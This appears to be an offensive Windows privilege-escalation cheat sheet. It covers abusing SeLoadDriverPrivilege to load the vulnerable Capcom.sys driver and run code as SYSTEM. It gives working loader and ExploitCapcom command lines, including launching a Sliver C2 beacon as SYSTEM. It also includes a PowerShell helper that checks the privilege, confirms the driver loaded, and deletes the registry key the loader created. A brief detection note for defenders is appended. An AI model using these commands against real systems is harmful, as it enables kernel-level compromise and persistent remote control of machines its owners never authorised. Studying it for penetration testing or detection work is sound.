👾 Overview

SeLoadDriverPrivilege (the "Load and unload device drivers" user right) lets a user load kernel drivers. Driver code runs in kernel mode, and Driver Signature Enforcement means an unsigned home-made driver will not load, so the practical abuse is to load a legitimately signed but vulnerable driver such as Capcom.sys and use its arbitrary kernel code execution bug to launch a payload as NT AUTHORITY\SYSTEM. Expect Defender and the Microsoft vulnerable driver blocklist (HVCI) to flag or block Capcom.sys on current systems.

🔍 Discovery

Requires a user who holds SeLoadDriverPrivilege on a Windows machine. Local Administrators have it by default (UAC strips it from a non-elevated token), and so do members of BUILTIN\Print Operators; the interesting case is any other account or group that has been granted the "Load and unload device drivers" right. Check the current token:

whoami /priv

A state of Disabled is fine: the loaders below enable the privilege themselves before calling NtLoadDriver. What matters is that the privilege is listed at all.

📌 Exploitation

Using k4sth4's repo: the first argument to eoploaddriver_x64.exe is a registry path relative to HKCU (the loader creates the service key there, so the name is arbitrary; dfserv is used below), the second is the full path to the driver on disk. Use an absolute path to the driver, since the kernel resolves ImagePath, not your shell:

# Load malicious driver
.\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sys
.\ExploitCapcom.exe LOAD C:\\Temp\\Capcom.sys
 
# Test Exploit
.\ExploitCapcom.exe EXPLOIT whoami
 
# Pop a Sliver beacon (the payload is spawned as SYSTEM)
.\ExploitCapcom.exe EXPLOIT beacon.exe

Using JoshMorrison99's repo (same HKCU key technique; the braces mark a placeholder, so pass the full driver path without them):

# Load the malicious driver
.\LoadDriver.exe System\CurrentControlSet\MyService {C:\Users\Test\Capcom.sys}
 
# Pop a Sliver beacon
.\ExploitCapcom.exe C:\full\path\to\beacon.exe
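The helper below is an added example for this page, not code from the k4sth4 or JoshMorrison99 repos. It covers the three things the procedure above leaves implicit: checking the token for the privilege (including the Disabled case and UAC filtering), confirming the driver actually loaded, and cleaning up the HKCU key. It assumes English whoami output and the key name dfserv from the k4sth4 command; change both if your setup differs.

```powershell
# Added example (not part of the k4sth4 / JoshMorrison99 repos).
# Assumptions: English whoami output; loader key name "dfserv" as used above.

# 1. Discovery: is SeLoadDriverPrivilege on the current token (even if Disabled),
#    is the shell elevated, and are we in Print Operators, which holds the right by default?
#    The State column ("Enabled"/"Disabled") is localized on non-English Windows.
function Test-SeLoadDriverPrivilege {
    $line = whoami /priv | Select-String -Pattern '^SeLoadDriverPrivilege\s'
    $id   = [Security.Principal.WindowsIdentity]::GetCurrent()
    [pscustomobject]@{
        Present        = [bool]$line
        Enabled        = [bool]($line -and $line.Line -match '\sEnabled\s*$')
        Elevated       = ([Security.Principal.WindowsPrincipal]$id).IsInRole(
                             [Security.Principal.WindowsBuiltInRole]::Administrator)
        PrintOperators = ($id.Groups.Value -contains 'S-1-5-32-550')  # BUILTIN\Print Operators
    }
}

# 2. Verification: a driver loaded through NtLoadDriver with an HKCU key is not an SCM
#    service, so driverquery / Win32_SystemDriver will not list it. Read the kernel's
#    loaded-module list directly via psapi!EnumDeviceDrivers instead.
Add-Type -Namespace Win32 -Name Psapi -MemberDefinition @'
[DllImport("psapi.dll", SetLastError = true)]
public static extern bool EnumDeviceDrivers([Out] IntPtr[] lpImageBase, uint cb, out uint lpcbNeeded);

[DllImport("psapi.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern uint GetDeviceDriverBaseName(IntPtr ImageBase, System.Text.StringBuilder lpBaseName, uint nSize);
'@

function Get-LoadedKernelModules {
    [uint32]$needed = 0
    # First call with a null buffer returns the byte count required.
    [void][Win32.Psapi]::EnumDeviceDrivers($null, 0, [ref]$needed)
    $bases = New-Object IntPtr[] ([int]($needed / [IntPtr]::Size))
    if (-not [Win32.Psapi]::EnumDeviceDrivers($bases, $needed, [ref]$needed)) {
        throw "EnumDeviceDrivers failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    foreach ($base in $bases) {
        $name = New-Object System.Text.StringBuilder 260
        [void][Win32.Psapi]::GetDeviceDriverBaseName($base, $name, $name.Capacity)
        $name.ToString()
    }
}

# 3. Cleanup: remove the service key the loader created under HKCU. This does NOT unload
#    the driver; it stays resident until NtUnloadDriver is called or the host reboots.
function Remove-LoaderKey {
    param([string]$KeyName = 'dfserv')   # hypothetical default, matches the command above
    Remove-Item -Path "HKCU:\System\CurrentControlSet\$KeyName" -Recurse -ErrorAction SilentlyContinue
}

# Usage
Test-SeLoadDriverPrivilege
Get-LoadedKernelModules | Where-Object { $_ -like 'Capcom*' }
Remove-LoaderKey
```

Run the discovery function before touching the loaders: if Present is true but Elevated is false from an admin account, you are in a UAC-filtered shell and need an elevated prompt, not this technique. On the blue side, the driver load shows up as Sysmon Event ID 6 (Driver loaded, with signer information) and, with Audit Sensitive Privilege Use enabled, as Security event 4673 naming SeLoadDriverPrivilege.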

📝 Resources